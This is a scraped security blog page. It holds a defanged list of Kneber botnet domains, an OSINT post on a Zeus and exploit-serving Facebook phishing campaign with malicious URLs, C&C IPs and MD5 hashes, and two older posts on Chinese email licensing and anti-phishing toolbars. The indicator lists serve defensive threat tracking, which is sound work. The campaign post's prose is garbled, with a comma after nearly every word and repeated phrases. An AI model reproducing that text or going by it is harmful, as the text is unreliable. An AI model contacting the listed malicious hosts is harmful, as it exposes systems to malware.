hxxp://gold-smerch.cn
hxxp://goldenmac.cn
hxxp://google.maniyakat.cn
hxxp://maniyakat.cn
hxxp://greenpl.com
hxxp://grizzli-counter.com
hxxp://grobin1.cn
hxxp://inpanel.cn
hxxp://itmasterz.org
hxxp://iuylqb.cn
hxxp://kaizerr.org
hxxp://keepmeupdated.cn
hxxp://khalej.cn
hxxp://kimosimotuma.cn
hxxp://klaikius.com
hxxp://klitar.cn
hxxp://kolordat482.com
hxxp://kotopes.cn
hxxp://liagand.cn
hxxp://love2coffee.cn
hxxp://majorsoftwareupdate.info
hxxp://marcusmed.com
hxxp://mcount.net
hxxp://mega-counter.com
hxxp://monstersoftware.info
hxxp://morsayniketamere.cn
hxxp://mydailymail.cn
hxxp://mynewworldorder.cn
hxxp://newsdownloads.cn
hxxp://nit99.biz
hxxp://nm.fcrazy.com
hxxp://nmalodbp.com
hxxp://not99.biz
hxxp://online-counter.cn
hxxp://pedersii.net
hxxp://piramidsoftware.info
hxxp://popupserf.cn
hxxp://qaqaqaqa.com
hxxp://qaqaqaqa.net
hxxp://qbxq16.com
hxxp://redlinecompany.ravelotti.cn
hxxp://ravelotti.cn
hxxp://relevant-information.cn

Related Hilary Kneber botnet posts:
Keeping Money Mule Recruiters on a Short Leash
Standardizing the Money Mule Recruitment Process
Dissecting the Exploits/Scareware Serving Twitter Spam Campaign
Koobface Botnet Starts Serving Client-Side Exploits

Continue reading →

Historical OSINT - Zeus and Client-Side Exploit Serving Facebook Phishing Campaign Spotted in the Wild

In, a, cybercrime, ecosystem, dominated, by, fraudulent, propositions, cybercrimianals, continue, actively, populating, their, botnet's, infected, population, with, hundreds, of, thousands, of, newly, affected, users, globally, potentially, compromising, the, confidentiality, integrity, and, availability, of, the, affected, hosts, to, a, multi-tude, of, malicious, software, further, earning, fraudulent, revenue, in, the, process, of, monetizing, the, affected, botnet's, population, largely, relying, on, the, utilization, of, affiliate-based, type, of, fraudulent, revenue, monetization, scheme.

We've, recently, intercepted, a, currently, circulating, malicious, spam, campaign, impersonating, Facebook, for, the, purpose, of, serving, client-side, exploits, to, socially, engineered, users, further, compromising, the, confidentiality, integrity, and, availability, of, the, affected, hosts, to, a, multi-tude, of, malicious, software, further, earning, fraudulent, revenue, in, the, process, of, monetizing, the, affected, hosts, largely, relying, on, the, use, of, affiliate-based, type, of, fraudulent, revenue, monetizing, scheme.

In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, infrastructure, behind it, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercriminals, behind, it, and, provide, actionable, intelligence, on, the, infrastructure, behind, it.

Sample, URL, exploitation, chain:
hxxp://auth.facebook.com.megavids.org/id735rp/LoginFacebook.php
    - hxxp://wqdfr.salefale.com/index.php - 62.193.127.197
        - hxxp://spain.salefale.com/index.php

Related, malicious, domains, known, to, have, participated, in, the, campaign:
hxxp://salefale.com - 112.137.165.114
    - hxxp://countrtds.ru - 91.201.196.102 - Email: thru@freenetbox.ru
       
Sample, detection, rate, for, the, malicious, executable:
MD5: e96c8d23e3b64d79e5e134a9633d6077
MD5: 19d9cc4d9d512e60f61746ef4c741f09

Once, executed, a, sample, malware, phones back to:
hxxp://makotoro.com

Related, malicious, C&C, server, IPs, known, to, have, participated, in, the, campaign:
hxxp://91.201.196.99
hxxp://91.201.196.77
hxxp://91.201.196.101
hxxp://91.201.196.35
hxxp://91.201.196.75
hxxp://91.201.196.76
hxxp://91.201.196.38
hxxp://91.201.196.34
hxxp://91.201.196.37

Related, malicious, C&C, server, IPs (212.175.173.88), known, to, have, participated, in, the, campaign:
hxxp://downloads.fileserversa.org
hxxp://downloads.fileserversc.org
hxxp://downloads.fileserversd.org
hxxp://downloads.portodrive.org
hxxp://downloads.fileserversj.org
hxxp://downloads.fileserversk.org
hxxp://downloads.fileserversm.org
hxxp://downloads.fileserversn.org
hxxp://downloads.fileserverso.org
hxxp://downloads.fileserversq.org
hxxp://downloads.fileserversr.org
hxxp://auth.facebook.com.megavids.org
hxxp://auth.facebook.com.fileserversl.com
hxxp://auth.facebook.com.legomay.com
hxxp://auth.facebook.com.crymyway.com
hxxp://auth.facebook.com.portodrive.net
hxxp://auth.facebook.com.modavedis.net
hxxp://auth.facebook.com.migpix.net
hxxp://auth.facebook.com.legomay.net
hxxp://auth.facebook.com.crymyway.net
hxxp://downloads.megavids.org
hxxp://downloads.regzavids.org
hxxp://downloads.vedivids.org
hxxp://downloads.restpictures.org
hxxp://downloads.modavedis.org
hxxp://downloads.fileserverst.org
hxxp://downloads.fileserversu.org
hxxp://downloads.regzapix.org
hxxp://downloads.reggiepix.org
hxxp://downloads.migpix.org
hxxp://downloads.restopix.org
hxxp://downloads.legomay.org
hxxp://downloads.vediway.org
hxxp://downloads.compoway.org
hxxp://downloads.restway.org
hxxp://downloads.crymyway.org
hxxp://downloads.fileserversa.com
hxxp://downloads.fileserversb.com
hxxp://downloads.fileserversc.com
hxxp://downloads.fileserversd.com
hxxp://downloads.fileserverse.com
hxxp://downloads.fileserversf.com
hxxp://downloads.fileserversg.com
hxxp://downloads.fileserversh.com
hxxp://downloads.fileserversi.com
hxxp://downloads.fileserversj.com
hxxp://downloads.fileserversk.com
hxxp://downloads.fileserversl.com
hxxp://downloads.fileserversm.com
hxxp://downloads.fileserversn.com
hxxp://downloads.fileserverso.com
hxxp://downloads.fileserversp.com
hxxp://downloads.fileserversq.com
hxxp://downloads.fileserversr.com
hxxp://downloads.regzavids.com
hxxp://downloads.vedivids.com
hxxp://downloads.restpictures.com
hxxp://downloads.modavedis.com
hxxp://downloads.fileserverss.com
hxxp://downloads.fileserverst.com
hxxp://downloads.fileserversu.com
hxxp://downloads.regzapix.com
hxxp://downloads.reggiepix.com
hxxp://downloads.migpix.com
hxxp://downloads.legomay.com
hxxp://downloads.vediway.com
hxxp://downloads.compoway.com
hxxp://downloads.crymyway.com
hxxp://downloads.fileserversa.net
hxxp://downloads.fileserversb.net
hxxp://downloads.fileserversc.net
hxxp://downloads.fileserversd.net
hxxp://downloads.fileserverse.net
hxxp://downloads.portodrive.net
hxxp://downloads.fileserversf.net
hxxp://downloads.fileserversg.net
hxxp://downloads.fileserversh.net
hxxp://downloads.fileserversi.net
hxxp://downloads.fileserversj.net
hxxp://downloads.fileserversk.net
hxxp://downloads.fileserversl.net
hxxp://downloads.fileserversm.net
hxxp://downloads.fileserversn.net
hxxp://downloads.fileserverso.net
hxxp://downloads.fileserversp.net
hxxp://downloads.fileserversq.net
hxxp://downloads.fileserversr.net
hxxp://downloads.regzavids.net
hxxp://downloads.vedivids.net
hxxp://downloads.tastyfiles.net
hxxp://downloads.restpictures.net
hxxp://downloads.modavedis.net
hxxp://downloads.fileserverss.net
hxxp://downloads.fileserverst.net
hxxp://downloads.fileserversu.net
hxxp://downloads.regzapix.net
hxxp://downloads.reggiepix.net
hxxp://downloads.migpix.net
hxxp://downloads.legomay.net
hxxp://downloads.vediway.net
hxxp://downloads.compoway.net
hxxp://downloads.restway.net
hxxp://downloads.crymyway.net

We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, developments, take, place. Continue reading →

Fighting Internet's email junk through licensing

Just came across this story at Slashdot, interesting approach :



"China has introduced regulations that make it illegal to run an email server without a licence. The new rules, which came into force two weeks ago, mean that most companies running their own email servers in China are now breaking the law. The new email licensing clause is just a small part of a new anti-spam law formulated by China's Ministry of Information Industry (MII)."



While the commitment is a remarkable event given China's booming Internet population -- among the main reasons Google had to somehow enter China's search market and take market share from Baidu.com -- you don't need a mail server to disseminate spam and phishing attacks like it used to be in the old days. You need botnets, namely, going through CME's List, you would see how the majority of today's malware is loaded with build-in SMTP engine, even offline/in-transit/web email harvesting modules.



You can often find China on the top of every recently released spam/phishing/botnet trends summary, which doesn't mean Chinese Internet users are insecure -- just unaware. What you can do is educate the masses to secure the entire population, and stimulate the growth of the local security market that everyone is so desperately trying to tap into.


Moreover, I doubt you can regulate the type of Internet users still trying to freely access information, again with the wrong attitude in respect to security :



"..prohibiting use of email to discuss certain vaguely defined subjects related to 'network security' and ' information security', and also reiterate that emails which contain content contrary to existing laws must not be copied or forwarded. Wide-ranging laws of this nature have been used against political and religous dissenters in the past."



It's like legally justifying the country's censorship practices through introducing the law, whereas I feel "network security" and "information security" attacks outside the homeland get favored, compared to internal ones, don't you?



Forbidden fruits turn into dangerous desires on the majority of occasions, and you just can't control that, what's left to censor it.



Technorati tags:
Security, Malware, Spam, Phishing, China Continue reading →

Heading in the opposite direction

Just one day before April 1st 2006 I came across this article :



"German retail banker Postbank will begin using electronic signatures on e-mails to its customers to help protect them from phishing attacks."



Catching up with the phishers seems to be a very worrisome future strategy. Electronic Signatures by themselves are rarely checked by anyone, and many more attack vectors are making the idea of this totally irrelevant. Moreover, a great research "Why phishing works" was recently released and it basically outlines basic facts such as how end users doesn't pay attention to security checks, if there's a definition of such given the attack vectors phishers have started using recently. In some of my previous posts "Security threats to consider when doing E-Banking", and "Anti Phishing toolbars - can you trust them?" I mentioned many other problems related to this bigger than it seems problem, what you should also keep an eye on is the good old ATM scam I hope you are aware of.



Postbank is often targeted by phishers, still, the best protection is the level of security awareness stated in here :



"Phishing attacks have led 80% of Germans to distrust banking related e-mails, according to TNS Infratest." Moreover, "Postbank's electronic signature service isn't possible with web-based e-mail services provided by local Internet service providers such as GMX GmbH and Freenet.de AG, according to Ebert. One exception is Web.de"



Thankfully, but that's when you are going in exactly the opposite direction than your customers are, while trying to estalibish reputable bank2customer relationship over email. Listen your customers first, and follow the trends, and do not try to use the most popular dissemination vector as a future communication one.



Something else in respect to recent phishing statistics is the key summary points of the recently released, AntiPhishingGroup's Report for January, 2006 report :



• Number of unique phishing reports received in January: 17,877
• Number of unique phishing sites received in January: 9715
• Number of brands hijacked by phishing campaigns in January: 101
• Number of brands comprising the top 80% of phishing campaigns in January: 6
• Country hosting the most phishing websites in January: United States
• Contain some form of target name in URL: 45 %
• No hostname just IP address: 30 %
• Percentage of sites not using port 80: 8 %
• Average time online for site: 5.0 days
• Longest time online for site: 31 days



I feel there's a lot more to expect than trying to re-establish the communication over a broken channel, as far as E-banking is concerned.



More resources you might be interested in taking a look at are :
Vulnerability of First-Generation Digital Certificates and Potential for Phishing Attacks
Netcraft: More than 450 Phishing Attacks Used SSL in 2005
SSL's Credibility as Phishing Defense Is Tested
Rootkit Pharming
The future of Phishing
Something is Phishy here...
Phishing Site Using Valid SSL Certificates
Thoughts on Using SSL/TLS Certificates as the Solution to Phishing



Technotati tags:
Security, Phishing, Scam, Banking Continue reading →

Anti Phishing toolbars - can you trust them?

A lot of recent phishing events occured, and what should be mentioned is their constant ambitions towards increasing the number of trust points between end users and the mirror version of the original site. The use of SSL and the ease of obtaining a valid certificate for to-be fraudelent domain is a faily simple practice. Phishing is so much more than this, and it even has to do with buying 0day vulnerabilities to keep itself competitive.


How should phishing be fought? Educating the end user not to trust that he/she's on Amazon.com, when he just typed it, or enforcing a technological solution to the problem of digital social engineering and trust building? As far as trends are concerned, according to the AntiPhishingGroup's latest report :



• Number of unique phishing reports received in December: 15244
• Number of unique phishing sites received in December: 7197
• Number of brands hijacked by phishing campaigns in December: 121
• Number of brands comprising the top 80% of phishing campaigns in December: 7
• Country hosting the most phishing websites in December: United States
• Contain some form of target name in URL: 51 %
• No hostname just IP address: 32 %
• Percentage of sites not using port 80: 7 %
• Average time online for site: 5.3 days
• Longest time online for site: 31 days


In case you haven't came across to this research "Do Security Toolbars Actually Prevent Phishing Attacks?" you'll find that it has very good points and actual evidence. Antiphishing filters and toolbars protection are gaining popularity, and many popular companies are fighting for market share of the end users'


desktop, but keep in mind that :



"We conducted two user studies of three security toolbars and other browser security indicators and found them all ineffective at preventing phishing attacks. Even though subjects were asked to pay attention to the toolbar, many failed to look at it; others disregarded or explained away the toolbars’ warnings if the content of web pages looked legitimate. We found that many subjects do not understand phishing attacks or realize how sophisticated such attacks can be."



The topic of phishing and fighting the problem has been again greatly extended by the researcher Min Xu, while writing the thesis "Fighting Phishing at the User Interface" and introducing a solution that measures a site's reputation and trustfulness. While, this is among the simplest ways Google uses to while assigning PageRank's, I find this a common sense warning. Still, with the constant flood of Web 2.0 companies, does it matter? :) Check out some screenshots from this outstanding thesis, and get the point :


Localizing the attacks, taking advantage of the momentum, or a software vulnerability within a popular browser or site itself, as well as taking advantage of malware, are among the most common practices these days. Moreover, I feel that fighting phishing the wrong way could erode the end user's trust in the Web on the other hand, so do your homework on the social impact on anything you do. NetCraft's Anti Phishing toolbar, whatsoever, is my favorite combination of them all, still, awareness and lack of naivety when it comes to transactions or authentication is the perfect tool, what about yours?



Some resources worth mentioning are :

Candid's “Phishing in the middle of the stream” Today’s threats to online banking
Know your Enemy : Phishing
Phishing attacks and countermeasures
The Phishing Guide
Distributed Phishing Attacks
Phishiest Countries
MailFrontier Phishing IQ Test
Online Identity Theft: Phishing Technology, Chokepoints and Countermeasures



Technorati tags :
Security, Phishing, Toolbar, AntiPhishing Group Continue reading →